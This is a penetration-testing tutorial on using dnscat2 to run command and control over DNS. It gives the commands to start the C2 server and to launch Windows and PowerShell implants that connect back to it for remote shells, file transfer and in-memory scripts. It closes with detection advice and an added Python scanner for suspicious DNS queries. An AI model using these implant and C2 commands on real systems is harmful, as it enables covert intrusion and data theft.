Even in the most restricted environments, DNS traffic is typically allowed so that hosts can resolve internal or external domains. This can be used as a communication channel between a target host and the command and control server. Commands and data are carried inside DNS queries and responses, so detection is difficult because arbitrary commands are hidden in legitimate traffic.
This technique can be implemented with Dnscat2, which creates a command and control channel over the DNS protocol. The tool uses a client (implant) written in C that needs to be executed on the target in order for the server to receive a connection. Traffic is transmitted in encrypted form, and the tool also supports authentication via pre-shared secrets.
The tool can be installed with the following commands from a Kali Linux 2.0 machine.
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
bundle install
The command and control server can be started with the following command.
ruby dnscat2.rb --dns "domain=pentestlab,host=192.168.1.169" --no-cache
A compiled version of the client (implant) for Windows systems can be downloaded directly from here. From the command prompt of the target the only requirement is to specify the DNS server in order to establish a connection with the C2 (Command & Control) server.
dnscat2-v0.07-client-win32.exe --dns server=192.168.1.169
From Dnscat2 the red teamer can start the interaction with the existing session that has been created:
session -i 1
By executing “help”, a list of available commands can be retrieved:
Part of the functionality of dnscat2 is to upload and download files, execute other programs and obtain a remote shell.
Obtaining a shell is easy with the “shell” command which will open another session:
The following output will appear on the command prompt of the target:
The shell will be interactive and fast and all the commands will be transferred over DNS traffic:
Launching another program remotely is possible by calling the executable:
Luke Baggett developed a PowerShell version of the implant, which was introduced and described on the blackhillsinfosec website. The commands are the same, but additional features have been added, such as an interactive PowerShell session and the ability to run scripts directly from memory.
The following command needs to be executed from a PowerShell session on the target:
PS C:\> start-Dnscat2 -Domain pentestlab -DNSServer 192.168.1.169
It is also possible to establish a direct PowerShell session by running the following:
A new console will be created with the ability to execute PowerShell commands and scripts:
There are various advantages of command and control over DNS with dnscat2. Some of them are:
- Support of multiple sessions
- Traffic encryption
- Protection from MiTM attacks with a secret key
- Run PowerShell scripts directly from memory
Because arbitrary commands are transferred behind legitimate DNS traffic, detection is difficult. Emphasis should be given to monitoring the length of DNS queries and to allowing hosts to communicate only with DNS servers that are trusted.
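The two checks recommended above (query length and trusted DNS servers), shown as an added example that is not part of the original article: a small Python scan over constructed DNS query log lines. The log format, the trusted resolver addresses and both length thresholds are assumptions to be tuned against a baseline of normal traffic.

```python
# Added example: flag DNS queries that are unusually long or sent to
# resolvers outside the approved list.
TRUSTED_RESOLVERS = {"10.0.0.53", "10.0.1.53"}  # assumption: approved resolvers
MAX_QNAME_LEN = 60   # assumption: total query-name length threshold
MAX_LABEL_LEN = 40   # assumption: single-label length threshold

# Constructed sample data: "<time> <client> <resolver> <qtype> <qname>"
LONG = "a1b2c3d4" * 7  # 56-character label standing in for encoded data
SAMPLE_LOG = "\n".join([
    "2024-01-01T10:00:01 10.0.5.20 10.0.0.53 A www.example.com",
    f"2024-01-01T10:00:02 10.0.5.21 192.168.1.169 TXT {LONG}.pentestlab",
    f"2024-01-01T10:00:03 10.0.5.22 10.0.0.53 CNAME {LONG}.pentestlab.",
    "2024-01-01T10:00:04 10.0.5.23 203.0.113.9 A intranet.example.com",
    "truncated line",
])

def parse_line(line):
    """Return a record dict, or None when the line is malformed."""
    fields = line.split()
    if len(fields) != 5:
        return None
    ts, client, resolver, qtype, qname = fields
    return {"ts": ts, "client": client, "resolver": resolver,
            "qtype": qtype, "qname": qname.rstrip(".").lower()}

def reasons_for(rec):
    """List the policy checks this query fails."""
    reasons = []
    if rec["resolver"] not in TRUSTED_RESOLVERS:
        reasons.append("untrusted_resolver")
    if len(rec["qname"]) > MAX_QNAME_LEN:
        reasons.append("long_qname")
    if max(len(label) for label in rec["qname"].split(".")) > MAX_LABEL_LEN:
        reasons.append("long_label")
    return reasons

def scan(log_text):
    """Return (client, qname, reasons) for every query that fails a check."""
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # skip malformed lines instead of aborting the scan
        reasons = reasons_for(rec)
        if reasons:
            alerts.append((rec["client"], rec["qname"], reasons))
    return alerts

if __name__ == "__main__":
    for client, qname, reasons in scan(SAMPLE_LOG):
        print(client, ",".join(reasons), qname[:40])
```

The third sample line shows why both checks are needed: a query relayed through a trusted resolver passes the resolver check but is still caught by its length.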